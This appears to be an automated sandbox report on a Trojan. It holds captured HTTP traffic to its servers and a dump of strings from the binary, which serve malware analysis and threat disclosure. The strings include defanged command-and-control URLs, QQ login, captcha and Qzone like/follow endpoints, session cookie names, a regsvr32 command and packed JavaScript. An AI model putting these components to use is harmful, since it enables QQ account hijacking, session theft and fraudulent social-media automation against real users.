Content-Type: text/html
Content-Location: hXXp://ad.51pc114.cn/setup/a.html
Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT
Accept-Ranges: bytes
ETag: "3efdd9d93cadcf1:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: safedog-flow-item=; expires=Thur, 9-Nov-2017 15:59:18 GMT; domain=51pc114.cn; path=/
Date: Thu, 09 Nov 2017 02:17:18 GMT
[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]HTTP/1.1 200 OK..Content-
Length: 45..Content-Type: text/html..Content-Location: hXXp://ad.51pc1
14.cn/setup/a.html..Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT..Acce
pt-Ranges: bytes..ETag: "3efdd9d93cadcf1:321"..Server: Microsoft-IIS/6
.0..X-Powered-By: ASP.NET..Set-Cookie: safedog-flow-item=; expires=Thu
r, 9-Nov-2017 15:59:18 GMT; domain=51pc114.cn; path=/..Date: Thu, 09 N
ov 2017 02:17:18 GMT..[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]..



GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1510193852775 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 09 Nov 2017 02:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Wed, 08 Nov 2017 09:38:54 GMT
Cache-control: private
HTTP/1.1 200 OK..Date: Thu, 09 Nov 2017 02:18:54 GMT..Server: Microsof
t-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 0..Content-Type: tex
t/html..Expires: Wed, 08 Nov 2017 09:38:54 GMT..Cache-control: private
..



GET /fclose.php?id=152695 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz12.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: u291014.778669.com
Connection: Keep-Alive


HTTP/1.1 403 Forbidden
Server: nginx/1.0.11
Date: Thu, 09 Nov 2017 02:17:35 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 571
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx/1.0.
11</center>..</body>..</html>..<!-- a padding to 
disable MSIE and Chrome friendly error page -->..<!-- a padding 
to disable MSIE and Chrome friendly error page -->..<!-- a paddi
ng to disable MSIE and Chrome friendly error page -->..<!-- a pa
dding to disable MSIE and Chrome friendly error page -->..<!-- a
 padding to disable MSIE and Chrome friendly error page -->..<!-
- a padding to disable MSIE and Chrome friendly error page -->..HTT
P/1.1 403 Forbidden..Server: nginx/1.0.11..Date: Thu, 09 Nov 2017 02:1
7:35 GMT..Content-Type: text/html; charset=gb2312..Content-Length: 571
..Connection: keep-alive..<html>..<head><title>403 F
orbidden</title></head>..<body bgcolor="white">..<
;center><h1>403 Forbidden</h1></center>..<hr&g
t;<center>nginx/1.0.11</center>..</body>..</html&
gt;..<!-- a padding to disable MSIE and Chrome friendly error page 
-->..<!-- a padding to disable MSIE and Chrome friendly error pa
ge -->..<!-- a padding to disable MSIE and Chrome friendly error
 page -->..<!-- a padding to disable MSIE and Chrome friendly er
ror page -->..<!-- a padding to disable MSIE and Chrome friendly
 error page -->..<!-- a padding to disable MSIE and Chrome f
<<< skipped >>>


GET /setup/ssxczgg2269.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ad.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:20 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;....................................................<hr>..<
p>................</p>..<ul>..<li>...............
.........................................</li>..<li>......
......................................................................
......</li>..<li>....<a href="javascript:history.back(1
)">....</a>....................</li>..</ul>..<
h2>HTTP .... 404 - ..................<br>Internet ........ (I
IS)</h2>..<hr>..<p>..............................<
;/p>..<ul>..<li>.... <a href="hXXp://go.microsoft.co
m/fwlink/?linkid=8180">Microsoft ............</a>..........&l
dquo;HTTP”..“404”........</li>..<li>....
“IIS ....”...... IIS ...... (inetmgr) ....................
....“........”..“............”..“.......
...........”........</li>..</ul>..</TD><
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1504:

.text
`.rdata
@.data
.rsrc
t%SVh
t$(SSh
~%UVW
u$SShe
Jiu2.iu
1wK(.wS
user32.dll
ole32.dll
kernel32.dll
wininet.dll
SkinH_EL.dll
advapi32.dll
dc.dll
gdiplus.dll
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ReportError
GdiplusShutdown
WebBrowser
mailto:shenglin_yu@126.com
hXXp://VVV.7532.com
hXXp://VVV.7532.com/forum-49-1.html
O;.lQ5"
ytv%c]`
\dc.dll
@.reloc
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
MFC42.DLL
MSVCRT.dll
KERNEL32.dll
WSOCK32.dll
MSVCP60.dll
ReportError_A
VBYB_ReportError
VB_ReportError
uu_loginA
uu_loginW
uu_reportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
hXXp://qlogo2.store.qq.com/qzone/
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
8926356713
hXXp://api.t.qq.com/qzApp/appHomePage.php?index=1&home=1&apiType=5&g_tk=
hXXp://z.t.qq.com/mb/qzone/index.html
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
"loginedUser"
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.5.0
application/x-www-form-urlencoded
hXXp://api.t.qq.com/old/follow.php
hXXp://api.t.qq.com/proxy.html
hXXp://z.t.qq.com/mb/qzone/index.html#
&veriCode=&lieuId=&apiType=5&apiHost=http://api.t.qq.com&g_tk=
&apiType=5&apiHost=http://api.t.qq.com&_r=
hXXp://api.t.qq.com/qzApp/appUserTweets.php?filter=0&uid=
hXXp://api.t.qq.com/old/unfollow.php
hXXp://ad.51pc114.cn/setup/yinyue.html
.html
hXXp://y.qq.com/y/static/singer/
&loginUin=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_add.fcg?singermid=
hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_getnum.fcg?singermid=
hXXp://user.qzone.qq.com/p/g/fcg-bin/cgi_emotion_list.fcg?uin=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: user.qzone.qq.com
Referer: hXXp://user.qzone.qq.com/
X-Real-Url: hXXp://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
&zb_url=http://i.gtimg.cn/qzone/space_item/pre/1/1_1.gif
&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
/?t=0.11051907816539691&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=
qzreferrer=http://user.qzone.qq.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
hXXp://ad.51pc114.cn/setup/ssxczgg2269.txt
hXXp://VVV.7532.com/thread-145964-1-1.html
122.228.204.12
hXXp://blog.sina.com.cn/s/blog_81b5163c0102vw7z.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
hXXps://
hXXp://
hXXp://123.51pc114.cn/ad/ssggd1.htm
Adodb.Stream
fJ.WM_
CX%xm
Õ6m*
n.BjCw
%s;7*
0%x@w
%C^L:
%s T5
]E4%F(
.Funr
k%UPp
fg.VG
%C',@
>Ùd
0'.Ll
[I(3/#N0.bd
j"%u=w
q%Xn`
@|H.NI
.wdd!
S|%u4
*.Ea]S
Q.CGo
fTpe
.LLbX
-.Mdl
\-A}=3K
Y:.akpS
$.Zcqn
.WE= T!N
#?%s(C(
u.Jck~
zx/%FN[
%s=\RI
}j%c%Y)
Rx.GR
4o#.dM
IeS`%C
[n 4\.UY 
,4.qO,
gQ'.Io
%cLur?
s%DHB
]I%%X
5r.US
:mD].tB
f%fUZ
.fOuV12
*_.dC
&-N}<
({?.cQm
.Cqx~c
.`.Qw
**.dU
!n]%x
%X,Cr
&.PFy{xh
.um ZZE7L
/^p%u$
I.NoQY
zu.ew
D/.nT
b\SkinH_EL.dll
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVFW32.dll
USER32.dll
51pc114.cn
123.51pc114.cn
hXXp://123.51pc114.cn/setup/kjkjz1.htm
Www.7532.com
hXXp://ad.51pc114.cn/setup/a.html
regsvr32 /s winhttp.dll
WinHttp
hXXp://123.51pc114.cn/setup/QQljz1.html
p_skey=;
airkey=;
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=
&pt_qr_link=https://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=https://z.qzone.com/download.html&pt_no_auth=0
pt_login_sig
hXXps://ssl.ptlogin2.qq.com/check?pt_tea=2&uin=
function r(n,t){return n<<t|n>>>32-t}
function i(n,r){n[r>>5]|=128<<r2,n[(r 64>>>9<<4) 14]=r;var u,i,a,h,g,l=1732584193,d=-271733879,v=-1732584194,C=271733878;for(u=0;u<n.length;u =16)i=l,a=d,h=v,g=C,l=e(l,d,v,C,n[u],7,-680876936),C=e(C,l,d,v,n[u 1],12,-389564586),v=e(v,C,l,d,n[u 2],17,606105819),d=e(d,v,C,l,n[u 3],22,-1044525330),l=e(l,d,v,C,n[u 4],7,-176418897),C=e(C,l,d,v,n[u 5],12,1200080426),v=e(v,C,l,d,n[u 6],17,-1473231341),d=e(d,v,C,l,n[u 7],22,-45705983),l=e(l,d,v,C,n[u 8],7,1770035416),C=e(C,l,d,v,n[u 9],12,-1958414417),v=e(v,C,l,d,n[u 10],17,-42063),d=e(d,v,C,l,n[u 11],22,-1990404162),l=e(l,d,v,C,n[u 12],7,1804603682),C=e(C,l,d,v,n[u 13],12,-40341101),v=e(v,C,l,d,n[u 14],17,-1502002290),d=e(d,v,C,l,n[u 15],22,1236535329),l=o(l,d,v,C,n[u 1],5,-165796510),C=o(C,l,d,v,n[u 6],9,-1069501632),v=o(v,C,l,d,n[u 11],14,643717713),d=o(d,v,C,l,n[u],20,-373897302),l=o(l,d,v,C,n[u 5],5,-701558691),C=o(C,l,d,v,n[u 10],9,38016083),v=o(v,C,l,d,n[u 15],14,-660478335),d=o(d,v,C,l,n[u 4],20,-405537848),l=o(l,d,v,C,n[u 9],5,568446438),C=o(C,l,d,v,n[u 14],9,-1019803690),v=o(v,C,l,d,n[u 3],14,-187363961),d=o(d,v,C,l,n[u 8],20,1163531501),l=o(l,d,v,C,n[u 13],5,-1444681467),C=o(C,l,d,v,n[u 2],9,-51403784),v=o(v,C,l,d,n[u 7],14,1735328473),d=o(d,v,C,l,n[u 12],20,-1926607734),l=c(l,d,v,C,n[u 5],4,-378558),C=c(C,l,d,v,n[u 8],11,-2022574463),v=c(v,C,l,d,n[u 11],16,1839030562),d=c(d,v,C,l,n[u 14],23,-35309556),l=c(l,d,v,C,n[u 1],4,-1530992060),C=c(C,l,d,v,n[u 4],11,1272893353),v=c(v,C,l,d,n[u 7],16,-155497632),d=c(d,v,C,l,n[u 10],23,-1094730640),l=c(l,d,v,C,n[u 13],4,681279174),C=c(C,l,d,v,n[u],11,-358537222),v=c(v,C,l,d,n[u 3],16,-722521979),d=c(d,v,C,l,n[u 6],23,76029189),l=c(l,d,v,C,n[u 9],4,-640364487),C=c(C,l,d,v,n[u 12],11,-421815835),v=c(v,C,l,d,n[u 15],16,530742520),d=c(d,v,C,l,n[u 2],23,-995338651),l=f(l,d,v,C,n[u],6,-198630844),C=f(C,l,d,v,n[u 7],10,1126891415),v=f(v,C,l,d,n[u 14],15,-1416354905),d=f(d,v,C,l,n[u 5],21,-57434055),l=f(l,d,v,C,n[u 12],6,1700485571),C=f(C,l,d,v,n[u 3],10,-1894986606),v=f(v,C,l,d,n[u 10],15,-1051523),d=f(d,v,C,l,n[u 1],21,-2054922799),l=f(l,d,v,C,n[u 8],6,1873313359),C=f(C,l,d,v,n[u 15],10,-30611744),v=f(v,C,l,d,n[u 6],15,-1560198380),d=f(d,v,C,l,n[u 13],21,1309151649),l=f(l,d,v,C,n[u 4],6,-145523070),C=f(C,l,d,v,n[u 11],10,-1120210379),v=f(v,C,l,d,n[u 2],15,718787259),d=f(d,v,C,l,n[u 9],21,-343485551),l=t(l,i),d=t(d,a),v=t(v,h),C=t(C,g);return[l,d,v,C]}
function a(n){var t,r="";for(t=0;t<32*n.length;t =8)r =String.fromCharCode(n[t>>5]>>>t2&255);return r}
function h(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;t<r.length;t =1)r[t]=0;for(t=0;t<8*n.length;t =8)r[t>>5]|=(255&n.charCodeAt(t/8))<<t2;return r}
function g(n){return a(i(h(n),8*n.length))}
function l(n,t){var r,u,e=h(n),o=[],c=[];for(o[15]=c[15]=void 0,e.length>16&&(e=i(e,8*n.length)),r=0;r<16;r =1)o[r]=909522486^e[r],c[r]=1549556828^e[r];return u=i(o.concat(h(t)),512 8*t.length),a(i(c.concat(u),640))}
function d(n){var t,r,u="0123456789abcdef",e="";for(r=0;r<n.length;r =1)t=n.charCodeAt(r),e =u.charAt(t>>>4&15) u.charAt(15&t);return e}
function cdata(y){if("string"==typeof y&&""!=y){var r=0;y=y.replace(/"/g,'"'),y=y.replace(/'/g,"'");var n;try{n=eval('(' y ')')}catch(e){};if("object"==typeof n&&"string"==typeof n.randstr&&("string"==typeof n.M||"number"==typeof n.M)&&"string"==typeof n.ans){n.ans=n.ans.toLowerCase(),n.M=parseInt(n.M);for(var s=0;s<n.M&&s<1e3;s  ){var i=n.randstr s,c=md5(i);if(n.ans==c.toLowerCase()){r=s;return r;}}}}};
return Math.floor(1e6 * Math.random())
n = "_aq_"   Math.floor(1e6 * Math.random());
hXXps://ssl.captcha.qq.com/cap_union_prehandle?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
websig:"
.*?="({.*?})"
hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
Pfunction time(){return Math.random()}
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
&websig=
aid=549000912&captype=&protocol=https&clientype=1&disturblevel=&apptype=2&noheader=0&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=
&js_ver=10225&js_type=1&login_sig=
&pt_randsalt=2&pt_jstoken=3116114273&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=3-5-
hXXps://ssl.ptlogin2.qq.com/login?u=
hXXp://user.qzone.qq.com/
function time(){return new Date().getTime()}
skey
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62))) ((c=cb)>35?String.fromCharCode(c 29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([7joB-EG-SU-Y]|[1-3]\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('o 1A=1e.1B((V 1C).2l()/2m);"17"!==G Y&&(Y={});(j(){j a(b){B 10>b?"0" b:b}j k(b){q.2n=0;B q.1R(b)?\'"\' b.1m(q,j(b){o a=f[b];B"14"===G a?a:"\\\\u" ("2o" b.1S(0).N(16)).18(-4)}) \'"\':\'"\' b \'"\'}j b(a,g){o r,f,c=l,p,d=g[a];d&&"17"===G d&&"j"===G d.19&&(d=d.19(a));"j"===G n&&(d=n.O(g,a,d));switch(G d){1n"14":B k(d);1n"1T":B 2p(d)?1o(d):"1a";1n"boolean":1n"1a":B 1o(d);1n"17":K(!d)B"1a";l =m;p=[];K("[17 Array]"===1U.W.N.1D(d)){g=d.Q;D(a=0;a<g;a =1)p[a]=b(a,d)||"1a";f=0===p.Q?"[]":l?"[\\n" l p.1b(",\\n" l) "\\n" c "]":"[" p.1b(",") "]";l=c;B f}K(n&&"17"===G n)D(g=n.Q,a=0;a<g;a =1)"14"===G n[a]&&(r=n[a],(f=b(r,d))&&p.S(k(r) (l?": ":":") f));1c D(r in d)1U.W.1p.O(d,r)&&(f=b(r,d))&&p.S(k(r) (l?": ":":") f);f=0===p.Q?"{}":l?"{\\n" l p.1b(",\\n" l) "\\n" c "}":"{" p.1b(",") "}";l=c;B f}}"j"!==G 1C.W.19&&(1C.W.19=j(){B 2p(7.2q())?7.getUTCFullYear() "-" a(7.getUTCMonth() 1) "-" a(7.getUTCDate()) "T" a(7.getUTCHours()) ":" a(7.getUTCMinutes()) ":" a(7.getUTCSeconds()) "Z":1a},1o.W.19=Number.W.19=Boolean.W.19=j(){B 7.2q()});o g,q,l,m,f,n;"j"!==G Y.U&&(q=/[\\\\\\"\\x00-\\x1f\\x7f-\\x9f\\2r\\2s-\\2t\\2u\\2v\\2w\\2x-\\2y\\2z-\\2A\\2B-\\2C\\2D\\2E-\\2F]/g,f={"\\b":"\\\\b","\\t":"\\\\t","\\n":"\\\\n","\\f":"\\\\f","\\r":"\\\\r",\'"\':\'\\\\"\',"\\\\":"\\\\\\\\"},Y.U=j(a,g,f){o k;m=l="";K("1T"===G f)D(k=0;k<f;k =1)m =" ";1c"14"===G f&&(m=f);K((n=g)&&"j"!==G g&&("17"!==G g||"1T"!==G g.Q))1V 2G("Y.U");B b("",{"":a})});"j"!==G Y.R&&(g=/[\\u0000\\2r\\2s-\\2t\\2u\\2v\\2w\\2x-\\2y\\2z-\\2A\\2B-\\2C\\2D\\2E-\\2F]/g,Y.R=j(a,b){j f(c,a){o d,e,h=c[a];K(h&&"17"===G h)D(d in h)1U.W.1p.O(h,d)&&(e=f(h,d),void 0!==e?h[d]=e:delete h[d]);B b.O(c,a,h)}o k;a=1o(a);g.2n=0;g.1R(a)&&(a=a.1m(g,j(c){B"\\\\u" ("2o" c.1S(0).N(16)).18(-4)}));K(/^[\\],:{}\\s]*$/.1R(a.1m(/\\\\(?:["\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").1m(/"[^"\\\\\\n\\r]*"|true|false|1a|-?\\d (?:\\.\\d*)?(?:[eE][ \\-]?\\d )?/g,"]").1m(/(?:^|:|,)(?:\\s*\\[) /g,"")))B k=eval("(" a ")"),"j"===G b?f({"":k},""):k;1V V SyntaxError("Y.R");})})();j L(a,k){B a 1e.1B(1e.1F()*(k-a))}j 1W(b,a){D(o k=[],g=0;g<(a?a:L(4,6));g  )b=L(b,b 1),k.S(b);B k}o 1f=j(a){o k=X.1f.2H.R("0123456789abcdef");B X.1X.1g(a,k,{iv:k,1d:X.1d.2I,1q:X.1G.2J}).N()},1r=j(a){o k=[];a =1;D(o b=0;b<a;b  )0!==b&&a-1!==b&&b!==L(b,a-1)||k.S({t:1==a?L(1,10):b,x:L(123,345),y:L(135,246)});B k},X=X||j(a,k){o b={},g=b.1s={},q=j(){},l=g.2K={E:j(c){q.W=7;o a=V q;c&&a.1H(c);a.1p("H")||(a.H=j(){a.$2L.H.1D(7,2M)});a.H.W=a;a.$2L=7;B a},P:j(){o c=7.E();c.H.1D(c,2M);B c},H:j(){},1H:j(c){D(o a in c)c.1p(a)&&(7[a]=c[a]);c.1p("N")&&(7.N=c.N)},1h:j(){B 7.H.W.E(7)}},m=g.1Y=l.E({H:j(c,a){c=7.M=c||[];7.J=a!=k?a:4*c.Q},N:j(c){B(c||n).U(7)},1t:j(c){o a=7.M,d=c.M,e=7.J;c=c.J;7.1Z();K(e%4)D(o h=0;h<c;h  )a[e h>>>2]|=(d[h>>>2]>>>24-h%4*8&C)<<24-(e h)%4*8;1c K(65535<d.Q)D(h=0;h<c;h =4)a[e h>>>2]=d[h>>>2];1c a.S.1D(a,d);7.J =c;B 7},1Z:j(){o c=7.M,b=7.J;c[b>>>2]&=4294967295<<32-b%4*8;c.Q=a.2N(b/4)},1h:j(){o c=l.1h.O(7);c.M=7.M.18(0);B c},1F:j(c){D(o b=[],d=0;d<c;d =4)b.S(4294967296*a.1F()|0);B V m.H(b,c)}}),f=b.1f={},n=f.Hex={U:j(c){o a=c.M;c=c.J;D(o d=[],e=0;e<c;e  ){o h=a[e>>>2]>>>24-e%4*8&C;d.S((h>>>4).N(16));d.S((h&15).N(16))}B d.1b("")},R:j(c){D(o a=c.Q,d=[],e=0;e<a;e =2)d[e>>>3]|=2O(c.substr(e,2),16)<<24-e%8*4;/*Hs*/B V m.H(d,a/2)}},u=f.Latin1={U:j(c){o a=c.M;c=c.J;D(o d=[],e=0;e<c;e  )d.S(1o.fromCharCode(a[e>>>2]>>>24-e%4*8&C));B d.1b("")},R:j(a){D(o c=a.Q,d=[],e=0;e<c;e  )d[e>>>2]|=(a.1S(e)&C)<<24-e%4*8;B V m.H(d,c)}},w=f.2H={U:j(a){try{B decodeURIComponent(escape(u.U(a)))}catch(p){1V 2G("Malformed UTF-8 data");}},R:j(a){B u.R(unescape(2P(a)))}},r=g.2Q=l.E({12:j(){7.1i=V m.H;7.2R=0},1u:j(a){"14"==G a&&(a=w.R(a));7.1i.1t(a);7.2R =a.J},1j:j(c){o b=7.1i,d=b.M,e=b.J,h=7.13,g=e/(4*h),g=c?a.2N(g):a.max((g|0)-7.20,0);c=g*h;e=a.min(4*c,e);K(c){D(o f=0;f<c;f =h)7.2S(d,f);f=d.2T(0,c);b.J-=e}B V m.H(f,e)},1h:j(){o a=l.1h.O(7);a.1i=7.1i.1h();B a},20:0});g.Hasher=r.E({I:l.E(),H:j(a){7.I=7.I.E(a);7.12()},12:j(){r.12.O(7);7.21()},update:j(a){7.1u(a);7.1j();B 7},1k:j(a){a&&7.1u(a);B 7.1I()},13:16,22:j(a){B j(c,d){B(V a.H(d)).1k(c)}},_createHmacHelper:j(a){B j(c,d){B(V v.HMAC.H(a,d)).1k(c)}}});o v=b.25={};B b}(1e);(j(){o a=X,k=a.1s.1Y;a.1f.2U={U:j(a){o b=a.M,k=a.J,l=7.26;a.1Z();a=[];D(o m=0;m<k;m =3)D(o f=(b[m>>>2]>>>24-m%4*8&C)<<16|(b[m 1>>>2]>>>24-(m 1)%4*8&C)<<8|b[m 2>>>2]>>>24-(m 2)%4*8&C,n=0;4>n&&m .75*n<k;n  )a.S(l.1v(f>>>6*(3-n)&63));K(b=l.1v(64))D(;a.Q%4;)a.S(b);B a.1b("")},R:j(a){o b=a.Q,q=7.26,l=q.1v(64);l&&(l=a.29(l),-1!=l&&(b=l));D(o l=[],m=0,f=0;f<b;f  )K(f%4){o n=q.29(a.1v(f-1))<<f%4*2,u=q.29(a.1v(f))>>>6-f%4*2;l[m>>>2]|=(n|u)<<24-m%4*8;m  }B k.P(l,m)},26:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /="}})();X.1s.2V||j(a){o k=X,b=k.1s,g=b.2K,q=b.1Y,l=b.2Q,m=k.1f.2U,f=k.25.EvpKDF,n=b.2V=l.E({I:g.E(),1J:j(d,a){B 7.P(7.1K,d,a)},1L:j(d,a){B 7.P(7.2W,d,a)},H:j(d,a,c){7.I=7.I.E(c);7.2a=d;7.2X=a;7.12()},12:j(){l.12.O(7);7.21()},process:j(d){7.1u(d);B 7.1j()},1k:j(d){d&&7.1u(d);B 7.1I()},1w:4,2b:4,1K:1,2W:2,22:j(d){B{1g:j(a,h,b){B("14"==G h?p:c).1g(d,a,h,b)},1x:j(a,b,g){B("14"==G b?p:c).1x(d,a,b,g)}}}});b.StreamCipher=n.E({1I:j(){B 7.1j(!0)},13:1});o u=k.1d={},w=j(d,e,c){o b=7.2c;b?7.2c=a:b=7.2d;D(o h=0;h<c;h  )d[e h]^=b[h]},r=(b.BlockCipherMode=g.E({1J:j(d,a){B 7.2Y.P(d,a)},1L:j(a,e){B 7.2Z.P(a,e)},H:j(a,e){7.2e=a;7.2c=e}})).E();r.2Y=r.E({2f:j(a,e){o d=7.2e,c=d.13;w.O(7,a,e,c);d.30(a,e);7.2d=a.18(e,e c)}});r.2Z=r.E({2f:j(a,e){o d=7.2e,c=d.13,b=a.18(e,e c);d.31(a,e);w.O(7,a,e,c);7.2d=b}});u=u.2I=r;r=(k.1G={}).2J={1G:j(a,e){e*=4;e-=a.J%e;D(o d=e<<24|e<<16|e<<8|e,c=[],b=0;b<e;b =4)c.S(d);e=q.P(c,e);a.1t(e)},33:j(a){a.J-=a.M[a.J-1>>>2]&C}};b.34=n.E({I:n.I.E({1d:u,1q:r}),12:j(){n.12.O(7);o a=7.I,e=a.iv,a=a.1d;K(7.2a==7.1K)o c=a.1J;1c c=a.1L,7.20=1;7.35=c.O(a,7,e&&e.M)},2S:j(a,e){7.35.2f(a,e)},1I:j(){o a=7.I.1q;K(7.2a==7.1K){a.1G(7.1i,7.13);o e=7.1j(!0)}1c e=7.1j(!0),a.33(e);B e},13:4});o v=b.CipherParams=g.E({H:j(a){7.1H(a)},N:j(a){B(a||7.36).U(7)}}),u=(k.1y={}).37={U:j(a){o d=a.1M;a=a.1l;B(a?q.P([38,39]).1t(a).1t(d):d).N(m)},R:j(a){a=m.R(a);o d=a.M;K(38==d[0]&&39==d[1]){o c=q.P(d.18(2,4));d.2T(0,4);a.J-=16}B v.P({1M:a,1l:c})}},c=b.SerializableCipher=g.E({I:g.E({1y:u}),1g:j(a,c,b,g){g=7.I.E(g);o d=a.1J(b,g);c=d.1k(c);d=d.I;B v.P({1M:c,1N:b,iv:d.iv,algorithm:a,1d:d.1d,1q:d.1q,13:a.13,36:g.1y})},1x:j(a,c,b,g){g=7.I.E(g);c=7.2g(c,g.1y);B a.1L(b,g).1k(c.1M)},2g:j(a,c){B"14"==G 